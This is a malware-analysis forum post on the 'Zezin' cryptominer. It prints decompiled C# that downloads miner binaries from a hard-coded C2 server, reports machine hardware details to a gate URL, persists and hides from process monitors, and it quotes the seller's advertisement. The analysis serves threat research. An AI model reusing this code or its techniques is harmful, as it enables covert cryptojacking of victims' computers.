A forum for reverse engineering, OS internals and malware analysis 

Forum for analysis and discussion about malware.
 #31113  by Xylitol
 Sun Dec 10, 2017 11:31 pm
New monero miner called Zezin due to it's pdb (and also because other signaures from AV sucks), originally found by siri (i guess)
Particularity to have a control panel:
https://twitter.com/CryptoInsane/status ... 3919035392
https://twitter.com/CryptoInsane/status ... 0389664769

Sample in attach (17kb): VxVault - VT
Connect to a server for getting mining tool and start mining.
Attempt to detect if one of these process are running: taskmgr, procexp, ProcessHacker, procexp64
And if yes hide kill (lol, what did you expect) the miner, till these process disapear.
- Settings:
Code: Select all
internal class Settings
{
    // Fields
    public const string dcr_name = "audiodg.exe";
    public const string DcrArgs = "--blake256 -o http://dcr.pool.mn:4722 -u vlad12345123.user -p password";
    public const string DcrBlake = "http://185.58.206.45/panel/mr/blake256.cl";
    public static bool DcrEnable = false;
    public const string DcrUrl = "http://185.58.206.45/panel/mr/conhost.exe";
    public static string ExecutableDir = Environment.CurrentDirectory;
    public static string ExecutablePath = Application.ExecutablePath;
    public const string Gate = "http://185.58.206.45/panel/gate.php";
    public const string Mutex = "1";
    public const int Timeout = 30;
    public const string Update = "http://185.58.206.45/panel/set.php";
    public const string xmr_name = "curl.exe";
    public const string XmrArgs = "-o pool.minexmr.com:4444 -u 43GmE9A1TQo7sNS7CHUvvbgK1eDTYd1FtQKnP27URLkngsaxkfHKBogJaHEf1CmnbeLaNAUdmCqRoX6iBNLDy4RyKDHXy4o -p x -t 4 --donate-level=1";
    public const string XmrUrlX32 = "http://185.58.206.45/panel/mr/curl.exe";
    public const string XmrUrlX64 = "http://185.58.206.45/panel/mr/audiodg.exe";
}
- Main routine:
Code: Select all
internal class Program
{
    // Methods
    private static void Main(string[] args)
    {
        try
        {
            OnlyOneInstance.CheckIstance();
            StartUp.Add();
            Miners.RunXmr();
            Miners.RunDcr();
            new Controller();
            Update.Logic();
        }
        catch
        {
        }
    }
}
- Various parts:
Code: Select all
DownloadFile("http://185.58.206.45/panel/mr/conhost.exe", DirectoryWithDcr + "audiodg.exe");
DropMinerDcr();
---
DownloadFile(SystemInformation.Is64Bit ? "http://185.58.206.45/panel/mr/audiodg.exe" : "http://185.58.206.45/panel/mr/curl.exe", DirectoryWithXmr + "curl.exe");
DropMinerXmr();
---
public static void GetCommands()
{
    object[] args = new object[] { SystemInformation.HardwareId, SystemInformation.Is64Bit, "1", SystemInformation.GetGpuName(), SystemInformation.GetCpuName(), DateTime.Now };
    string parameter = string.Format("?machine_id={0}&x64={1}&version={2}&video_card={3}&cpu={4}&junk={5}", args);
    GetResponse("http://185.58.206.45/panel/gate.php", parameter);
}
Some stats from the guy spreading the sample:
Code: Select all
Address: 43GmE9A1TQo7sNS7CHUvvbgK1eDTYd1FtQKnP27URLkngsaxkfHKBogJaHEf1CmnbeLaNAUdmCqRoX6iBNLDy4RyKDHXy4o
Pending Balance: 0.099649891113 XMR
Personal Threshold (Editable):
0.500 XMR
Total Paid: 0.000000000000 XMR
The following stats are only for the base address and not all workers:
Last Share Submitted: 3 days ago
Hash Rate: 0.00 H/sec
Total Hashes Submitted: 487883029
epic fail profit.

Some know servers used by Zezin: Advert from 14 oct 2017 sold by 'A310':
https://i.imgur.com/Xm5fgiw.png

Бот:
- Поддержка CPU (определение: x32/x64)
- Поддержка GPU (определение: Radeon/Nvidia).
- Скрытие майнера от большинства таскеров.
- Возможность обновления бота.
- Авторан (не реестр).
- Доступна торифицированная версия бота (выдаю только в очень крайних случаях).
- Контроль майнеров (в любом случае майнер будет восстановлен, пока жив бот).
- Запасной адрес отстука. (Опционально)
- Рандомная генерация воркеров на основе ид машины. (Опционально)
- Бесплатные ребилды.
- Вес: 60 КБ.
- NET 2.0.
- Все обновления и любая поддержка по боту бесплатны.
- Можно менять конфигурацию майнера прямо из панели (пул, кошелек, нагрузка и тд.).

Стандартная сборка майнеров:
Monero (CPU) + Опционально: Decred (GPU)

ЯП: C#

Функционал Панели:

- Dashboard:
[*] Онлайн, Живые, За все время, За сутки.
[*] Последние машины.

- Machines:
[*] Статистика по всем ботам.
[*] Уникальный ID машины, Битность, Версия бота, Видеокарта, ЦПУ, Первый онлайн, Последний онлайн.

- Update:
[*] Возможность обновить бота.

- Arguments:
[*] Возможность сменить конфигурацию майнера.

Цена Комплекта: 125$.

Контакты:
PM
Jabber: a310@exploit.im

---

Bot:
- CPU support (definition: x32 / x64)
- GPU support (definition: Radeon / Nvidia).
- Miner is not visible if detected (taskmanager, process explorer and etc.)
- Ability to update the bot (for changing the miners, new functionality).
- Hide the miner from most of the taskers.
- A Tor version of the bot is available. (in rare cases).
- Autoran (not the register).
- You can change the configuration of the miner directly from the panel (pool, purse, load, etc.).
- Random generation of vorkers based on the machine's id. (Optional)
- Control of the miners (in any case, the miner will be restored while the bot is alive).
- Free rebuildings.
- Size: 50 KB.
- NET 2.0.
- All updates and any support on the bot are free.

Standard assembly of the miners:
Monero (CPU) + Optional: Decred (GPU)

Panel:

- Dashboard:
[*] Online, Alive, All Time, Day.
[*] Last Machines.

- Machines:
[*] Statistics for all bots.
[*] Unique machine ID, x32/x64, Bot Version, VideoCard, CPU, First Online, Last Online.

- Update:
[*] Update The Bot.

- Arguments:
[*] Ability to change the configuration of the miner.

Price Set: 125$.

Contacts:
PM
Jabber: a310@exploit.im
+3 samples in attach
https://www.virustotal.com/en/file/e6ed ... 512959976/ - amazonccc.ru
https://www.virustotal.com/en/file/5d8d ... 512959977/ - amazonccc.ru
https://www.virustotal.com/en/file/bc6c ... 512959978/ -159.224.138.20
Attachments
infected
(153.5 KiB) Downloaded 49 times
infected
(9.83 KiB) Downloaded 49 times